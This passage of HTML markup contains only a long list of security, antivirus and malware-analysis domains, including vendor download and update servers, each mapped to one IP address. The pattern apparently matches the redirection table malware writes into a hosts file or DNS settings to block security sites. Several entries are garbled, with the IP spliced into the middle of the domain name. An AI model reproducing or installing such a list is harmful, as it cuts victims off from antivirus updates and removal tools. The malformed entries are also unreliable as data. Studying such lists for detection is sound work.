<span style="font-family: Arial; font-size: 10.0pt;">freespaceinternetsecurit=209.85.229.104y.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sunbelt-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">prevx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.seclab.tuwien.a=209.85.229.104c.at<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">joebox.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gmer.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antirootkit.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sectools.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandboxie.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nepenthes.mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mwcollect.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">amtso.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsslabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">icsalabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">checkvir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">check-mark.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.protectstar-testlab.=209.85.229.104org<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">protectstar-testlab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware-test.co=209.85.229.104m<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware-test.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wildlist.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">aavar.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staysafeonline.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">rokop-security.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wilderssecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avp.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslist.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslist.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky-antivirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads4.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads5.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-us3.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu1.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads-eu2.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kavdumps.kaspersky.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyclub.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kasperskylab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.kaspersky-labs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data.kaspersky.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.z-oleg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freedrweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-desk.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drweb.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dr-web.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.drweb.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">updates.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sald.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb.imshop.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.safeweb.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.symantecstore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantecliveu=209.85.229.104pdate.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service1.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.service1.symantec.co=209.85.229.104m<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">security.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">liveupdate.symantec.d4p.=209.85.229.104net<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securityresponse.symante=209.85.229.104c.com<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sygate.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.esetnod32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.eset.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.su=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod-32.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.allnod.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusall.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32eset.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.eset.sk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl3.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl4.antivir.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.free-av.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dlpro.antivir.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.forum.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avira-antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avirus.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">de.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mx.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafee-online.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeesecure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avertlabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eu.shopmcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siblog.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.mcafeestore.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">service.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.siteadvisor.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanalert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drsolomon.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wwww.mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onlinescan.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download1.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download2.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download3.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download4.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download5.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download6.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download7.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trustdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sshop.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.com=209.85.229.104<o:p></o:p></span></div>
